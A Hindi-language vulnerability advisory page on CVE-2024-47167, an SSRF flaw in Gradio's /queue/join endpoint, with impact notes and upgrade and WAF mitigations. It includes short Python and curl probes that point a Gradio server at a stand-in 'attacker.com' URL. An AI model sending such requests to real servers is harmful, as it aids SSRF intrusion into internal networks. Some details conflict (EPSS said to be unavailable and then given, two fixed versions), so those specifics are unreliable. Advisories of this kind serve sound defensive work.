प्लेटफ़ॉर्म
python
घटक
gradio
में ठीक किया गया
5.0.1
5.0.0
CVE-2024-47167 एक सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) भेद्यता है जो Gradio के संस्करण 5.0.0b9 और उससे पहले के संस्करणों को प्रभावित करती है। यह भेद्यता /queue/join एंडपॉइंट में मौजूद है, जहाँ हमलावर asyncsaveurltocache फ़ंक्शन का उपयोग करके Gradio सर्वर को उपयोगकर्ता-नियंत्रित URL पर अनुरोध भेजने के लिए मजबूर कर सकते हैं। संस्करण 5.0.0 में इस समस्या का समाधान किया गया है।
इस SSRF भेद्यता के कारण, हमलावर Gradio सर्वर को आंतरिक नेटवर्क के भीतर स्थित आंतरिक सर्वरों या सेवाओं को लक्षित करने के लिए उपयोग कर सकते हैं। वे संवेदनशील डेटा को निकालने या अनचाहे आंतरिक अनुरोधों को ट्रिगर करने में सक्षम हो सकते हैं। इसके अतिरिक्त, इन URL से सामग्री को स्थानीय रूप से संग्रहीत किया जाता है, जिससे हमलावरों के लिए संभावित रूप से दुर्भावनापूर्ण फ़ाइलों को सर्वर पर अपलोड करना आसान हो जाता है। यह भेद्यता डेटा उल्लंघनों, अनधिकृत पहुंच और संभावित रूप से सिस्टम समझौता करने का कारण बन सकती है।
CVE-2024-47167 को अभी तक KEV में शामिल नहीं किया गया है। EPSS स्कोर की जानकारी उपलब्ध नहीं है। सार्वजनिक रूप से उपलब्ध प्रूफ-ऑफ-कॉन्सेप्ट (PoC) अभी तक ज्ञात नहीं हैं, लेकिन SSRF भेद्यता की प्रकृति के कारण, इसका शोषण किया जा सकता है। यह भेद्यता 2024-10-10 को प्रकाशित हुई थी।
Organizations deploying Gradio to expose machine learning models or other internal applications are at significant risk. Shared hosting environments where multiple users share the same Gradio instance are particularly vulnerable, as an attacker could potentially exploit the vulnerability to target other users' data or resources.
• python / gradio:
import requests
import urllib3
http = urllib3.PoolManager()
try:
response = http.request('GET', 'http://your-gradio-server/queue/join?url=http://attacker.com/malicious.txt')
print(response.status)
except Exception as e:
print(f"Error: {e}")• generic web:
curl -I 'http://your-gradio-server/queue/join?url=http://attacker.com/malicious.txt' | grep -i 'Location:'disclosure
एक्सप्लॉइट स्थिति
EPSS
0.24% (47% शतमक)
CISA SSVC
CVSS वेक्टर
Gradio के संस्करण 5.0.0 में अपग्रेड करना इस भेद्यता को ठीक करने का सबसे प्रभावी तरीका है। यदि अपग्रेड संभव नहीं है, तो /queue/join एंडपॉइंट तक पहुंच को सीमित करने के लिए वेब एप्लिकेशन फ़ायरवॉल (WAF) या प्रॉक्सी नियमों का उपयोग करने पर विचार करें। सुनिश्चित करें कि Gradio सर्वर को केवल आवश्यक आंतरिक संसाधनों तक ही पहुंच प्राप्त है। URL सत्यापन और इनपुट सैनिटाइजेशन लागू करें ताकि हमलावरों को मनमाना URL निर्दिष्ट करने से रोका जा सके। अपग्रेड के बाद, यह सत्यापित करें कि भेद्यता ठीक हो गई है, /queue/join एंडपॉइंट पर एक अनुरोध भेजकर जो एक आंतरिक संसाधन को लक्षित करता है और सुनिश्चित करता है कि अनुरोध विफल हो जाता है।
Gradio लाइब्रेरी को संस्करण 5.0 या उच्चतर में अपडेट करें। वैकल्पिक रूप से, अपने Gradio एप्लिकेशन में URL-आधारित इनपुट को विश्वसनीय डोमेन तक अक्षम या प्रतिबंधित करें। सख्त URL सत्यापन लागू करें और सुनिश्चित करें कि स्थानीय या आंतरिक नेटवर्क पतों को `/queue/join` एंडपॉइंट के माध्यम से अनुरोध नहीं किया जा सकता है।
भेद्यता विश्लेषण और गंभीर अलर्ट सीधे आपके ईमेल में।
CVE-2024-47167 Gradio के /queue/join एंडपॉइंट में एक सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) भेद्यता है, जो हमलावरों को आंतरिक सर्वरों को लक्षित करने की अनुमति देती है।
यदि आप Gradio के संस्करण 5.0.0b9 या उससे पहले का उपयोग कर रहे हैं, तो आप इस भेद्यता से प्रभावित हैं।
Gradio के संस्करण 5.0.0 में अपग्रेड करें। यदि अपग्रेड संभव नहीं है, तो WAF नियमों का उपयोग करके /queue/join एंडपॉइंट तक पहुंच को सीमित करें।
हालांकि सार्वजनिक रूप से शोषण का कोई प्रमाण नहीं है, SSRF भेद्यता की प्रकृति के कारण, इसका शोषण किया जा सकता है।
कृपया Gradio की सुरक्षा सलाहकारियों के लिए आधिकारिक वेबसाइट देखें: [https://github.com/gradio-app/gradio/security/advisories](https://github.com/gradio-app/gradio/security/advisories)
अपनी डिपेंडेंसी फ़ाइल अपलोड करें और तुरंत जानें कि यह CVE और अन्य आपको प्रभावित करती हैं या नहीं।
अपनी requirements.txt फ़ाइल अपलोड करें और तुरंत जानें कि आप प्रभावित हैं या नहीं।